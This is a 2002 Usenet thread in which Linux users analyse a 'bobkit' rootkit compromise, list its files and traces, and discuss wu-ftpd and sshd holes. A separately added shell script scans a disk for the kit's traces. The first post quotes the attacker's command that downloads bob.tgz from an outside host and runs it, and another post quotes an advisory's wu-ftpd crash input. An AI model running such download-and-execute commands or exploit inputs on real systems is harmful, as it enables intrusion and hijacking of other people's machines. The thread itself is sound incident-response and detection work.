
Hacked by "bobkit"


Willy Angenent

16 Jan 2002, 14:26:08
Hi fellow linux users,

I've discovered a rootkit installed on my linux computer called "bobkit". It
was exploited presumably by another ssh or wu-ftp exploit. I've only been
able to find three references to this rootkit in newsgroups. One of 'em
describes the exact same attack. The origin seems to be from Dutch internet
providers where the tgz rootkits are downloaded from.

Here's a short account of what I've found out up to now:

During the ssh or wu-ftp exploit these commands were issued using a perl
script:

@commands = ("su root","cd /tmp ; rm -rf bob* ; if [ -f /usr/bin/lynx ];
then export TERM=vt100 ; /usr/bin/lynx -dump
http://dufiles.is.dreaming.org/bob.tgz >bob.tgz ; else if [ -f
/usr/bin/wget ]; then /usr/bin/wget http://dufiles.is.dreaming.org/bob.tgz ;
else if [ -f /usr/bin/ncftpget ]; then /usr/bin/ncftpget
ftp://dufiles.mine.nu/bob.tgz -P 2121 ; fi ; fi ; fi ; tar zxf bob.tgz ; cd
bob ; ./bob&");

(taken from the .bkit-war file in /usr/include/...)

I downloaded the bob.tgz file and here's what's in it:

total 36
drwxr-xr-x 2 root root 4096 Dec 21 15:49 adore
drwxr-xr-x 2 root root 4096 Jan 15 15:10 base
drwxr-xr-x 2 root root 4096 Jan 15 15:23 bin
-rwxr-xr-x 1 root users 14722 Jan 15 17:25 bob
-rw-r--r-- 1 root root 0 Jan 16 19:49 files
drwxr-xr-x 2 root root 4096 Jan 15 17:10 hax0r
drwxr-xr-x 2 root root 4096 Jan 16 19:28 lib

./adore:
total 32
-rw-r--r-- 1 root root 13475 Nov 28 2000 adore.c
-rw-r--r-- 1 root root 4336 Nov 28 2000 ava.c
-rw-r--r-- 1 root root 3118 Nov 28 2000 libinvisible.c
-rw-r--r-- 1 root root 2463 Nov 28 2000 libinvisible.h

./base:
total 24
-rwxr--r-- 1 root root 736 Jan 15 16:21 bkit-lc
-rwxr-xr-x 1 root root 11882 Dec 8 11:36 bkit-pg
-rwxr-xr-x 1 root root 1535 Dec 20 09:01 bkit-rpass
-rwxr-xr-x 1 root root 1596 Oct 25 2000 bkit-sz

./bin:
total 740
-rwxr-xr-x 1 root root 655336 Dec 22 13:26 bkit-shd
-rwxr-xr-x 1 root root 6986 Dec 13 12:37 dir
-rwxr-xr-x 1 root root 4619 Dec 14 00:06 du
-rwxr-xr-x 1 root root 4620 Dec 14 00:05 find
-rwxr-xr-x 1 root root 6122 Dec 14 00:05 ls
-rwxr-xr-x 1 root root 4612 Dec 14 00:05 lsof
-rwxr-xr-x 1 root root 4616 Dec 14 00:05 netstat
-rwxr-xr-x 1 root root 4828 Dec 14 00:06 psr
-rwxr-xr-x 1 root root 7030 Dec 13 12:37 pstree
-rwxr-xr-x 1 root root 6994 Dec 13 12:37 slocate
-rwx------ 1 root root 14885 Nov 29 2000 top
-rwxr-xr-x 1 root root 6989 Dec 13 12:37 vdir

./hax0r:
total 252
-rw-r--r-- 1 root root 626 Jan 15 15:15 bkit-ascii
-rw-r--r-- 1 root root 434 Dec 16 22:41 bkit-cfg
-rwxr-xr-x 1 root root 676 Dec 24 11:59 bkit-d
-rwxr--r-- 1 root root 308 Jan 10 14:07 bkit-dl
-rwxr-xr-x 1 root root 117956 Jan 15 15:17 bkit-f
-rwxr-xr-x 1 root root 55604 Jan 3 2001 bkit-get
-rwxr--r-- 1 root root 59 Jan 10 14:08 bkit-mc
-rwxr-xr-x 1 root root 571 Jan 14 22:50 bkit-patch
-rwx------ 1 root root 35501 Jan 15 15:08 bkit-sf
-rw-r--r-- 1 root root 407 Dec 10 09:39 bkit-shdcfg
-rw------- 1 root root 541 Dec 20 09:26 bkit-shhk
-rw-r--r-- 1 root root 51 Dec 14 01:15 proc.h

./lib:
total 76
-rwxr-xr-x 1 root root 33848 Sep 9 2000 libproc.a

In the bob script here's the maker's ID:
# BOBKit by sArGeAnt with some bins from linux rootkit 0.7 by tragedy/dor
and adore from t0rnkit 9 by t0rn

The bob script erases all traces of the break-in, replaces system
executables, modifies startup files, installs kernel modules, installs
SETI@home and several ip and portscanner type programs.

These are the traces I found on my system:
In /usr/include:
proc.h:
3 bkit-
3 sargeant
3 du-crew
3 d0wnunder
3 dufiles

file.h
.bkit-1010867046.tgz

in /usr/include/...

bk5ids
bk5ni
bk5realnm
.bkit-1010867046.tgz
bkit-binst
bkit-dl
bkit-get
.bkit-id
bkit-mc
.bkit-mf
bkit-mf
.bkit-mfclean
bkit-nmap
bkit-patch
bkit-pinst
.bkit-sar
bkit-sar
bkit-scan
bkit-screen -> /usr/bin/screen
bkit-sinst -> /bin/sleep
bkit-sleep
bkit-smr
.bkit-ss
.bkit-ssd
.bkit-ssh
bkit-ssh
.bkit-war
bkit-war
bkit-wmr
.bkit-wu
bkit-wu
core -> /dev/null
nohup.out -> /dev/null
targets
.tmp (dir)

in /usr/lib/...
bkit-ssh (dir)
du
find
ls
lsof
netstat
psr
pstree
slocate
top
uconf.inv

./bkit-ssh:
bkit-pw
bkit-shdcfg
bkit-shd.pid
bkit-shhk
bkit-shrs

in /usr/sbin/...
bkit-f
bkit-shd

And lastly in /usr/sbin/: a binary called ntpsx. This binary was called from
the /etc/rc.d init scripts.

I noticed the attack when a network monitor showed traffic which I wasn't
creating. I then noticed a strange entry in the output of the (modified)
ps command. chkrootkit warned me that a possible t0rnkit v8 or an LKM trojan was
installed. I tracked the kit down by using the command line 'find -name
"..."' after I guessed it was a t0rnkit modification.

Here are the source urls:
ftp://dufiles.mine.nu/bob.tgz
http://dufiles.is.dreaming.org/bob.tgz

Willy Angenent
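
The traces listed in the post above (directories literally named "...", bkit-* files, /usr/sbin/ntpsx and its init-script hook) can be swept for on a disk mounted from rescue media. This is an added example, not part of the original thread; the function names, output tags and the --demo tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: sweep a mounted filesystem for the BoBKit traces named in the thread.
# The kit ships replacement find/ls/du/netstat binaries and a kernel module, so run
# this with known-good tools (rescue media) against the suspect disk's mount point.

# Print one tagged line per finding under ROOT (default "/").
bobkit_findings() {
    root="${1:-/}"
    root="${root%/}"    # "/" becomes "", so "$root/usr" is still a valid path

    # Directories literally named "..." (the thread found them under /usr/include,
    # /usr/lib and /usr/sbin).
    find "$root/usr" -type d -name '...' 2>/dev/null | sed 's/^/HIDDEN_DIR /'

    # Kit components: names starting with "bkit-" or ".bkit-".
    find "$root/usr" \( -name 'bkit-*' -o -name '.bkit-*' \) 2>/dev/null |
        sed 's/^/KIT_FILE /'

    # The launcher binary the thread reports in /usr/sbin.
    if [ -e "$root/usr/sbin/ntpsx" ] || [ -L "$root/usr/sbin/ntpsx" ]; then
        echo "LAUNCHER $root/usr/sbin/ntpsx"
    fi

    # Init scripts under /etc/rc.d that call the launcher.
    grep -rl -- 'ntpsx' "$root/etc/rc.d" 2>/dev/null | sed 's/^/INIT_REF /'
    return 0
}

# Print findings; return 0 when the tree is clean, 1 when anything matched.
scan_bobkit() {
    findings=$(bobkit_findings "${1:-/}")
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# Build a constructed sample tree (empty files, not real evidence) under $1.
make_sample_tree() {
    mkdir -p "$1/usr/include/..." "$1/usr/lib/..." "$1/usr/sbin" "$1/etc/rc.d"
    : > "$1/usr/include/.../.bkit-war"
    : > "$1/usr/include/.../bkit-dl"
    : > "$1/usr/sbin/ntpsx"
    echo '/usr/sbin/ntpsx' > "$1/etc/rc.d/rc.local"
}

# "--demo" scans the constructed tree; any other argument is taken as a mount point.
if [ "${1:-}" = "--demo" ]; then
    t=$(mktemp -d)
    make_sample_tree "$t"
    scan_bobkit "$t"
    rm -rf "$t"
elif [ -n "${1:-}" ]; then
    scan_bobkit "$1"
fi
```

A clean result only covers the names reported in this thread; a renamed kit would not match.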


cra...@erols.com

16 Jan 2002, 22:13:18
What OS/distro are you running and what patches have been applied?

The dates (if they are close to being accurate) indicate a relatively
old exploit. Seeing adore would also indicate a year old root-kit.

The key thing is the exploit, not the installed root-kit. You seem to
think that it is either a ssh or wu-ftp exploit; this combo would seem
to indicate a rather recent exploit that I'm not aware of. I'm seeing an
increase in ssh (22) probes that I surmise to be related to the recently
announced sshd problem.

Sorry if this reply doesn't help answer your question. However, I would
like to know if a remote exploit for sshd or wu-ftpd exists.

Clyde

Row

16 Jan 2002, 23:19:48
On Wed, 16 Jan 2002 20:26:08 +0100, "Willy Angenent"
<nos...@spamspamspamspamspamspamspamspamspam.net> wrote:

>The bob script erases all traces of the break-in, replaces system
>executables, modifies startup files, installs kernel modules, installs
>SETI@home and several ip and portscanner type programs.

Can you determine which SETI@home user it is working as? I'd be
interested in looking up the stats for work units finished...

Luke Vogel

17 Jan 2002, 01:04:22
cra...@erols.com wrote:

> Sorry if this reply doesn't help answer your question. However, I would
> like to know if a remote exploit for sshd or wu-ftpd exists.

You can bet your family jewels that a group of hackers have put the
newly discovered ssh and wu-ftpd exploits into an attack kit!

It would be reasonably trivial to do by amending some of the code from the
worms that we have seen around in the past year or so.

I've downloaded the rootkit from the site that the OP showed in his
analysis, and I will see if the "adore" that you are talking about is in
fact a part of the worm, or if it is the adore kernel module that is
used to hide parts of the root kit.


--
Regards
Luke
------
Q: What does FAQ stand for?
A: We are Frequently Asked this Question, and we have no idea.
------
C.O.L.S FAQ - http://www.linuxsecurity.com/docs/colsfaq.html
Note: Remove NOSPAM from my return address if necessary
------

Willy Angenent

17 Jan 2002, 07:58:00
Clyde,

I was running Redhat 7.0 with a patched wu-ftp rpm. The only ports I had
open were ssh, ftp and apache so it has to be one of 'em. I reinstalled the
computer and cannot find out what version of openssh or wu-ftp I had. What I
can do is give you a copypaste of a file called 'targets' which was in the
/usr//include/... dir:


I'm guessing if you have one of these ssh's, you've got a problem. You would
have to try to hack yourself with the script files if you want to feel safe.

Willy

Willy Angenent

17 Jan 2002, 07:58:37
Yes, the adore part is compiled and installed in the kernel. This is the
part chkrootkit was complaining about which alerted me as well. The process
hiding is primitive though. If you use top, it's very easily identifiable that
there's something weird happening. And I was alerted in ps that there was
seemingly one process called "3" which constantly changed pid.


Willy Angenent

17 Jan 2002, 07:59:07
Actually, I reinstalled the computer and made copies of the
/usr/include/..., /usr/bin/... and /usr/lib/... directories and I couldn't
find any traces of it. But I checked the scripts and in the bkit-sinst file,
a file called bkit-set.tgz is downloaded from
http://dufiles.is.dreaming.org/bkit-seti.tgz

The site translates to webhop.dyndns.org, and the seti file is taken from
people.zeelandnet.nl.

In this tgz file are:

bkit-s
bkit-seti
key.sah
user_info.sah
version.sah

The user_info file gives:

type=user info
id=3367861
key=1329821647
email_addr=sarg...@du-crew.com
name=sArGeAnt
url=
country=Netherlands
postal_code=
show_name=yes
show_email=no
venue=3
register_time= 2452226.86240 (Tue Nov 13 08:41:51 2001)
last_wu_time= 0.00000
last_result_time= 0.00000
nwus=0
nresults=0
total_cpu=0.000000
params_index=0

I looked up the url and it's at:
http://setiathome.ssl.berkeley.edu/cgi-bin/cgi?email=sarg...@du-crew.com&cmd=user_stats_new

Name (and URL) sArGeAnt
Results Received 5325
Total CPU Time 9.337 years
Average CPU Time per work unit 15 hr 21 min 35.6 sec
Last result returned:Thu Jan 17 12:44:21 2002 UTC
Registered on:Tue Nov 13 08:41:50 2001 UTC
View Registration Class
SETI@home user for:1564 hr 11 min
Your group info:
You belong to the group named: SETI@Netherlands
You are the founder of: dU-crew

Your rank: (based on current workunits received)

Your rank out of 3489701 total users is: 10025th place.
The number of users who have this rank: 2
You have completed more work units than 99.713% of our users.

cya,
Willy

Silviu Minut

17 Jan 2002, 10:55:46
> You can bet your family jewels that a group of hackers have put the
> newly discovered ssh and wu-ftpd exploits into an attack kit!
>

Do you happen to know if openssh-server-2.9p2-11.7 is vulnerable? Do you
have a pointer to the ssh exploit you're talking about?


Willy Angenent

17 Jan 2002, 13:42:10


"Silviu Minut" <minu...@cps.msu.edu> wrote in message
news:3C46F402...@cps.msu.edu...

I don't know. I don't even know if the exploit I had a problem with is in
openssh or wu-ftpd.

An educated guess says I had these two installed:
wu-ftpd-2.6.1-18.i386.rpm
openssh-server-2.3.0p1-5.i386.rpm

The wu-ftpd has an exploit:

" The following (from the CORE advisory) demonstrates the existence of
this vulnerability:

ftp> open localhost
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection

1405 ? S 0:00 ftpd: accepting connections on port 21
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c
"

It looks like the wu-ftpd was the culprit.


Marc Greene

17 Jan 2002, 14:22:13

All of the ones I've seen rely on having an account on the target machine
(or at least guest access with wu-ftpd).

http://www.securiteam.com/exploits/6T00B203FC.html

References to these exploits are everywhere, try a search engine :-)

Marc


cra...@erols.com

17 Jan 2002, 22:08:37

Willy Angenent wrote:

> Clyde,
>
> I was running Redhat 7.0 with a patched wu-ftp rpm. The only ports I had
> open were ssh, ftp and apache so it has to be one of 'em. I reinstalled the
> computer and cannot find out what version of openssh or wu-ftp I had. What I
> can do is give you a copypaste of a file called 'targets' which was in the
> /usr//include/... dir:


-------big snip------------


> I'm guessing if you have one of these ssh's, you've got a problem. You would
> have to try to hack yourself with the script files if you want to feel safe.
>
> Willy


Normally I would say wu-ftp as there is a remote vulnerability that is
available (as you know). But you patched, so the likely culprit is
sshd. I'm seeing an increase in probes to port 22 on my home and work
computers. incidents.org have indicated that most of the probes for 22
seem to be coming from Asia.

One point. If it is sshd, then you might want to block it using a
firewall *and* /etc/hosts.deny.

The network security gurus at work have been hammering the masses about
upgrading sshd.

Clyde

Row

17 Jan 2002, 22:49:28

I've had two computers cranking away on SETI for a couple of years
now, and I'm only in the 97th percentile. Seems obvious that some of
his work units come from cracked machines. Wonder if the SETI people
have any record of IP addresses for returned work units? Maybe it'd
piss him off if they just removed his stats!

Willy Angenent

18 Jan 2002, 05:33:19
Yeah! Nine years of CPU time in data heaven would be a deserved fate!


"Row" <r...@column.com> wrote in message
news:pj6f4uo51jtr55qqc...@4ax.com...

Jonathan Ross

18 Jan 2002, 06:27:18
"Willy Angenent" <nos...@spamspamspamspamspamspamspamspamspam.net> wrote in message news:<a24k4g$6lb$1...@reader08.wxs.nl>...

> Hi fellow linux users,
>
> I've discovered a rootkit installed on my linux computer called "bobkit". It
> was exploited presumably by another ssh or wu-ftp exploit. I've only been
> able to find three references to this rootkit in newsgroups. One of 'em
> describes the exact same attack. The origin seems to be from Dutch internet
> providers where the tgz rootkits are downloaded from.
>

//snip

Hi,

yesterday I discovered the same rootkit on my RedHat 6.2 box. I too
had wu-ftp patches, so I think the hacker exploited Sshd -- I have
heard there are exploits for sshd 1 and 2, and am kicking myself for
not installing sshd 3 ages ago.
It seems that the rootkit was on my system for a month... aagh! I was
too busy to check system logs or fix security holes.

The signatures I encountered were similar to the ones you reported:
(apparently) the seti@home program was taking a lot of cpu. Sshd had
been replaced, and there were public and private keys in
/usr/lib/security/.bkit-s/ssh or somewhere like that (I am not at my
machine now, so I can't find the exact path...)

I also found some curious messages in my system log (something like
'SSHD: your version of sshd is way too old and no longer supported.').
Another noteworthy thing was some hidden files in /tmp (I will post
content on some other occasion), and the apparent use of uucp, nfslock
and other services.


What I really want now, is to find out who is doing this! You say you
think the person is operating from Holland? Any more clues? Perhaps
they were launching attacks from my system even?

Please get in touch, maybe we can get to the bottom of this together.


Jonathan Ross.

Dzuy

22 Jan 2002, 18:01:19
You're not alone.
I've found a /usr/bin/ntpsx line at the end of my rc.local file on my (RH7.1)
homemade firewall. A search on the newsgroup leads me to this article. I too
see a process named "3" that keeps changing PID. I can't seem to be able to
download the kit to see what's in it and what it does.

Seems like a new hack. My machine was infected sometime last week. Expect to
hear more about it soon?



"Willy Angenent" <nos...@spamspamspamspamspamspamspamspamspam.net> wrote in message news:<a24k4g$6lb$1...@reader08.wxs.nl>...

a

25 Jan 2002, 12:45:21

A co-worker's RH 7.1 box was cracked and had "bkit" (BoBKit) installed
as well as a DoS tool (tribal flood). Looks like they got in through another
wu-ftpd exploit. This was the original version off the RH 7.1 distro CD.
Patch patch patch.

There were a bunch of process control files in /tmp that defined what to
filter from netstat and ps.

The kits were installed in

/usr/lib/.../
/usr/sbin/.../
/usr/include/.../

There was a partially encrypted log file in /var/log called "pacc" or
something.

A trojan SSH v1 client (downund3r) was installed and listening on port 4545.

There was a process "3" running which is somehow related.

The file /usr/sbin/ntpsx started the trojan servers which was called by
/etc/rc.d/rc.local on startup.

In this case the SSH trojan was named "bkit-sd" and the tribal flood DoS
tool was "bkit-f"

On a side note, chkrootkit easily detected a compromise, even with many of
the trojaned system binaries in place. FYI

JC

"Dzuy" <dz...@my-deja.com> wrote in message
news:eb77e186.02012...@posting.google.com...

Reinier Post

27 Jan 2002, 09:55:35
"a" <a...@b.com> wrote:

>
>A co-worker's RH 7.1 box was cracked and had "bkit" (BoBKit) installed
>as well as a DoS tool (tribal flood). Looks like they got in through another
>wu-ftpd exploit. This was the original version off the RH 7.1 distro CD.
>Patch patch patch.

wu-ftpd is one of those programs that has been known for its security
holes ever since it existed. If you care about security, better switch
to a different ftpd.

--
Reinier

Markus Schabel

27 Jan 2002, 16:23:51

"Reinier Post" <r...@win.tue.nl> wrote in message
news:a314d7$kii$2...@news.tue.nl...

which would be the best?

greetz markus


Jem Berkes

27 Jan 2002, 16:26:28
>> wu-ftpd is one of those programs that has been known for its security
>> holes ever since it existed. If you care about security, better
>> switch to a different ftpd.
>
> which would be the best?

I've heard a lot of good things about proftpd (www.proftpd.net) and I also
use it myself. However, there are many smaller and equally secure servers
around that have features, and are not as hard to set up. Check out
freshmeat.net

Johan Kiviniemi

27 Jan 2002, 19:00:31
Jem Berkes <jb_do...@pc9.org> wrote:
> > which would be the best?

> I've heard a lot of good things about proftpd (www.proftpd.net) and I also
> use it myself.

Plain FTP is never secure. Consider using SFTP, FTP over SSH, FTP over SSL or
something like that..

For anonymous FTP, vsftpd might be good.

--
Johan Kiviniemi ion at hassers.org http://ion.amigafin.org/

Matthew Goldman

27 Jan 2002, 23:56:25
Markus Schabel wrote:


> which would be the best?
>
> greetz markus
>


ProFTPD [1] is an excellent open source server, with Apache [2] style
config. Otherwise, check out a variety[3] just to see.

--Matthew
[1]http://www.proftpd.net/
[2]http://httpd.apache.org/
[3]http://directory.google.com/Top/Computers/Software/Internet/Servers/FTP/
